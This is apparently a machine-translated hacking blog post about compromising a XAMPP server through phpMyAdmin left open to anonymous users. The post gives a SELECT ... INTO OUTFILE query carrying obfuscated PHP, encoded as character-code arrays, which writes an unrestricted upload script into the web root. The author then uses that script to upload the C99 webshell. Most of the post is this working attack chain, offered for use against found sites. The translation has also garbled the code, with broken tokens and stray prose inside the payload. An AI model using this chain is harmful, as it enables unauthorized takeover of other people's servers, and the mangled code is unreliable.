intrusion to a server through
XAMPP, so I thought I do some tests to see if it worked this technique, well my friend @ yoyahack, made an entry on his blog explaining how the
INTO OUTFILE , more information Explanation INTO OUTFILE a SQL injection.
sought to find a site that had enabled the visualization of phpmyadmin
by anonymous users. Once inside the phpmyadmin , I opened the phpinfo to see where information was located the installation folder because we will need later when creating the malicious file. In this case, is in the following path: # SCRIPT_FILENAME C: / xampp / htdocs / xampp / phpinfo.php
#
Then we build and run a query in MySQL within phpmyadmin
as follows, in order to create a file that will allow us to upload a WebShell.
shows the execution of the query. |
#
SELECT '\u0026lt;? Php $ file = crearcadena (array (115,117,98,101,116,101,46,112,104,112));
$contenido=crearcadena(array(60,63,112,104,112,13,10,105,110,105,95,115,101,116,40,39,117,112,108,111,97,100,95,109,97, 120,95,102,105,108,101,115,105,122,101,39,44,39,49,48,48,77,39,41,59,13,10,105,110,105,95,115,101,116,40,39,112,111,115,is now only enter the PATH
116,95,109,97,120,95,115,105,122,101,39,44,39,49,48,48,77,39,41,59,13,10,47,47,32,115,99,114,105,112,116,32,100,101,32,
117,112,108,111,97,100,13,10,36,115,116,97,116,117,115,32,61,32,34,69,114,114,111,114,34,59,13,10,47,47,32,111,98,116,101,
110,101,109,111,115,32,108,111,115,32,100,97,116,111,115,32,100,101,108,32,97,114,99,104,105,118,111,13,10,36,116,97,109,
97,110,111,32,61,32,36,95,70,73,76,69,83,91,34,97,114,99,104,105,118,111,34,93,91,39,115,105,122,101,39,93,59,13,10,36,116,
105,112,111,32,61,32,36,95,70,73,76,69,83,91,34,97,114,99,104,105,118,111,34,93,91,39,116,121,112,101,39,93,59,13,10,36,
97,114,99,104,105,118,111,32,61,32,36,95,70,73,76,69,83,91,34,97,114,99,104,105,118,111,34,93,91,39,110,97,109,101,39,93,
59,13,10,36,115,116,97,116,117,115,61,34,34,59,13,10,105,102,32,40,36,97,114,99,104,105,118,111,32,33,61,32,34,34,41,32,123,
13,10,47,47,32,103,117,97,114,100,97,109,111,115,32,101,108,32,97,114,99,104,105,118,111,32,97,32,108,97,32,99,97,114,112,
101,116,97,32,102,105,108,101,115,13,10,36,100,101,115,116,105,110,111,32,61,32,36,97,114,99,104,105,118,111,59,13,10,105,
102,32,40,99,111,112,121,40,36,95,70,73,76,69,83,91,39,97,114,99,104,105,118,111,39,93,91,39,116,109,112,95,110,97,109,101,
39,93,44,36,100,101,115,116,105,110,111,41,41,32,123,13,10,36,115,116,97,116,117,115,32,61,32,34,65,114,99,104,105,118,111,32,
115,117,98,105,100,111,58,32,34,46,36,97,114,99,104,105,118,111,46,34,34,59,13,10,125,32,101,108,115,101,32,123,13,10,36,115,
116,97,116,117,115,32,61,32,34,69,114,114,111,114,32,97,108,32,115,117,98,105,114,32,101,108,32,97,114,99,104,105,118,111,34,32,
46,36,97,114,99,104,105,118,111,59,13,10,125,13,10,125,32,101,108,115,101,32,123,13,10,36,115,116,97,116,117,115,32,61,32,34,
69,114,114,111,114,32,110,111,32,104,97,121,32,97,114,99,104,105,118,111,34,59,13,10,125,13,10,101,99,104,111,32,36,115,
116,97,116,117,115,59,13,10,63,62,13,10,60,104,116,109,108,62,13,10,60,104,101,97,100,62,13,10,60,47,104,101,97,100,62,13,10,
60,98,111,100,121,62,13,10,60,102,111,114,109,32,97,99,116,105,111,110,61,34,34,32,109,101,116,104,111,100,61,34,80,79,83,84,
34,32,101,110,99,116,121,112,101,61,34,109,117,108,116,105,112,97,114,116,47,102,111,114,109,45,100,97,116,97,34,62,13,10,60,
105,110,112,117,116,32,116,121,112,101,61,34,102,105,108,101,34,32,110,97,109,101,61,34,97,114,99,104,105,118,111,34,62,13,
10,60,105,110,112,117,116,32,116,121,112,101,61,34,115,117,98,109,105,116,34,32,110,97,109,101,61, 34,115,117,98,109,105,
116,34,32,118,97,108,117,101,61,34,101,110,118,105,97, 114,34,62,13,10,60,47,102,111,114,109,62,13,10,60,47,98,111,100,
121.62, 13,10,60,47,104,116,109,108,62));
$ fp = fopen ($ file, crearcadena (array (97)));
$ write = fputs ($ fp, $ content);
fclose ($ fp);
crearcadena function (array $ values) {
if ($ values) {
foreach ($ values \u200b\u200bas $ value) {$ str .= chr
($ value);
}} return
$ str;}
?> '
INTO OUTFILE' C: / xampp / htdocs / upload.php "
#
file anymore subete.php so would # #
http://PATH/subete.php We found an upload where we can upload any kind of file, this time climb the shell
C99.php
.
where we climbed the file shows. |
Now we WebShell within the server and can move between directories and much more.
Figure 3. WebShell Inage of action. |
already have everything and we still use our imagination to see that we him.
I leave a site to practice
Greetings to all the fucking especially
Progressive Death alias.
0 comments:
Post a Comment